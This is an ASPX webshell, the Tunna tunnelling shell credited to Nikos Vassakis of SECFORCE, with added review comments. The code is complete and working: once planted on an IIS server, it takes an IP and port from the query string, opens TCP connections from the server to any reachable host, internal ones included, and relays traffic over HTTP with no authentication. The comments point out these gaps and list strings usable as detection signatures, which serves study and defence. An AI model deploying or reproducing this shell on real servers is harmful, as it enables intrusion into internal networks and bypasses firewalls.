<%@ Page Language="C#" Debug="true" ENABLESESSIONSTATE = true ValidateRequest="false" %>
<%@ Import Namespace="System" %>
<%@ Import Namespace="System.IO" %>
<%@ Import Namespace="System.Web" %>
<%@ Import Namespace="System.Web.SessionState" %>
<%@ Import Namespace="System.Web.UI" %>
<%@ Import Namespace="System.Web.Configuration" %>
<%@ Import Namespace="System.Threading" %>
<%@ Import Namespace="System.Net" %>
<%@ Import Namespace="System.Net.Sockets" %>
<%@ Import Namespace="System.Text" %>
<script runat="server">
//
//Tunna ASPX webshell v0.1 (c) 2013 by Nikos Vassakis
//http://www.secforce.com / nikos.vassakis <at> secforce.com
//
// File-upload control field. Neither connect() nor Page_Load in the code shown here
// references it, and no markup for it is visible on this page.
protected System.Web.UI.HtmlControls.HtmlInputFile File1;
// Opens the outbound TCP connection that Page_Load later relays HTTP bodies over.
// The destination is read from Session["ip"] / Session["port"], which Page_Load fills from
// the request query string; nothing in this method restricts which host or port is used,
// so the web server itself becomes the source address of the connection.
// Returns: the connected socket, switched to non-blocking mode.
// On any failure a "[Server] ..." message is written to the HTTP response and the
// exception is rethrown to the caller.
protected Socket connect(){ //Create and connect to socket
Socket socket;
IPHostEntry ipHostInfo;
IPAddress ipAddress;
IPEndPoint remoteEP;
string ip;
int port;
try{ //Initialise values
// The (int) unboxing throws when Session["port"] is missing or is not an int; a missing
// Session["ip"] does not throw here (the cast yields null) and fails in the lookup below.
ip = (string) Session["ip"];
port = (int) Session["port"];
}
catch{
HttpContext.Current.Response.Write("[Server] Missing Arguments");
throw;
}
try{
// Dns.GetHostByAddress is an obsolete API; it performs a DNS lookup for the supplied
// address, so a connection attempt can also leave a DNS query behind.
ipHostInfo = Dns.GetHostByAddress(ip); //Dns.GetHostByName
ipAddress = ipHostInfo.AddressList[0];
if (ipAddress==null){ throw new Exception("Wrong IP"); }
remoteEP = new IPEndPoint(ipAddress, port);
socket = new Socket(AddressFamily.InterNetwork, SocketType.Stream, ProtocolType.Tcp);
socket.SetSocketOption(SocketOptionLevel.Socket, SocketOptionName.ReceiveTimeout, 2000); //NOTE: ReceiveTimeout is in milliseconds, so this is 2 seconds (the original note said 20)
}
catch{
// Session["ip"] originates from the query string and is written back without HTML
// encoding; the page directive also sets ValidateRequest="false", so the value is
// reflected into the response as supplied.
HttpContext.Current.Response.Write(Session["ip"]);
HttpContext.Current.Response.Write("[Server] Unable to resolve IP");
throw;
}
try{ //Connect to socket
socket.Connect(remoteEP);
}
catch(Exception){
HttpContext.Current.Response.Write("[Server] Unable to connect to socket");
throw;
}
try{ //Socket in non-blocking mode because of the consecutive HTTP requests
// In non-blocking mode Receive throws instead of waiting when no data is pending;
// Page_Load catches that and answers with an empty body.
socket.Blocking = false;
}
catch(Exception){
HttpContext.Current.Response.Write("[Server] Unable to set socket to non blocking mode");
throw;
}
return socket;
}
// Request handler for the page: relays raw bytes between HTTP requests and a TCP socket
// that is kept in ASP.NET session state across requests.
//
// Behaviour visible in this method:
//   - Only requests whose query string starts with "?proxy" are handled; anything else
//     returns an empty page.
//   - "?proxy&close" closes the stored socket, abandons the session and blanks the
//     session cookie.
//   - The "ip" and "port" query parameters choose the connection target (ip defaults to
//     127.0.0.1) and are stored in the session.
//   - Session["running"] drives a three-step state machine: unset -> 0 (first request),
//     0 -> 1 (second request, connect() is called), 1 (every later request relays data).
//
// NOTE(review): no authentication, authorization or destination allow-list is visible
// anywhere in this handler, and the page directive disables request validation
// (ValidateRequest="false"). Any client that can reach the page can make the server open
// TCP connections to hosts reachable from it, including loopback and internal addresses.
// The literal response strings ("[Server] ...", "[OK]") and the "?proxy" query prefix are
// fixed in the code, which makes them usable as content and log signatures.
protected void Page_Load(object sender, EventArgs e){
HttpContext.Current.Server.ScriptTimeout = 600; //NOTE: randomly chose 600
// These two locals are declared but never assigned or read in this method.
int port;
string ip;
if (Request.Url.Query.StartsWith("?proxy")){ //XXX:Stupid hack but works
if (Request.Url.Query.StartsWith("?proxy&close")){ //If url var close receive: close socket / invalidate session / Kill thread
Session["running"] = -1;
Socket socket = Session["socket"] as Socket;
if (socket != null){
socket.Close();
}
Session.Abandon();
// Overwrites the session cookie with an empty value so the client drops the old session id.
Response.Cookies.Add(new HttpCookie("ASP.NET_SessionId",""));
Response.Write("[Server] Killing the handler thread");
return;
}
if(Request.QueryString["port"] != null){ //if port is specified connects to that port
// Convert.ToInt32 is not wrapped in a try block: a non-numeric value raises an unhandled
// exception, and with Debug="true" in the page directive the error output may be detailed.
Session["port"] = Convert.ToInt32(Request.QueryString["port"]);
}
if(Request.QueryString["ip"] != null){ //if ip is specified connects to that ip
// Stored as received; no format or range check is applied to the address.
Session["ip"] = Request.QueryString["ip"];
}
else{
// Runs on every request that omits "ip", so the stored target is reset to loopback each time.
Session["ip"] = "127.0.0.1";
}
if(Session["running"] == null){ //1st request: initiate the session
Session["running"] = 0;
Response.Write("[Server] All good to go, ensure the listener is working ;-)");
}
else{
if ((int)Session["running"] == 0){ //2nd request: get configuration options
try{
// Keeping a live Socket in session state presumably requires in-process session storage,
// since a Socket is not serializable - confirm against the host configuration.
Session["socket"] = connect();
Session["running"] = 1;
Response.Write("[OK]"); //Send [OK] back
return;
}
catch(Exception){
// connect() has already written its "[Server] ..." error text; the exception is dropped here.
return;
}
}
else{
// Relay step: forward the request body to the socket, then return whatever the socket has pending.
// The "as" cast yields null when no socket is stored; the try blocks below absorb the
// resulting exception.
Socket socket = Session["socket"] as Socket;
//Read data from request and write to socket
// Reads the entire request body into memory; no size limit is applied in this code.
byte[] postData = Request.BinaryRead(Request.TotalBytes);
if (postData.Length > 0){
try{
socket.Send(postData);
}
catch(Exception){
HttpContext.Current.Response.Write("[Server] Local socket closed");
}
}
//Read Data from socket and write to response
// At most 8192 bytes are returned per HTTP request.
byte[] receiveBuffer = new byte[8192];
try{
int bytesRead = socket.Receive(receiveBuffer);
if (bytesRead > 0) {
//Welcome to C trim
// Copy only the bytes actually received so the response carries no buffer padding.
byte[] received = new byte[bytesRead];
Array.Copy(receiveBuffer, received , bytesRead);
Response.BinaryWrite(received);
}
else {
HttpContext.Current.Response.Write(""); //No data on socket: send nothing back
}
}
catch(Exception){
// Any receive failure, including "no data pending" on the non-blocking socket, yields an empty body.
HttpContext.Current.Response.Write("");
}
}
}
}
}
</script>